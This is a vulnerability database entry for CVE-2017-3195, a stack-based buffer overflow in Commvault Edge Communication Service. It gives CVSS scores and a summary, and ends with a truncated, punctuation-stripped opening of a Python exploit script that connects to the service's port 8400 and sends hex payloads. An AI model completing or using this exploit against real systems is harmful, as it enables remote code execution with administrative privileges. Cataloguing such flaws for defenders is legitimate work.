10
CVSSv2

CVE-2017-3195

Published: 16/12/2017 Updated: 11/12/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Commvault Edge Communication Service (cvd) prior to version 11 SP7 or version 11 SP6 with hotfix 590 is prone to a stack-based buffer overflow vulnerability that could lead to arbitrary code execution with administrative privileges.

Vulnerable Product Search on Vulmon Subscribe to Product

commvault edge 11.0.0

Exploits

import socket import binascii import time import struct s = socketsocket(socketAF_INET, socketSOCK_STREAM) ssettimeout(1) sconnect(("10101085", 8400)) def sr(p=None, r=None): if p: print "sending %d bytes: %s " % (len(p)/2,p) payl = binasciia2b_hex(p) ssend(payl) if r: ...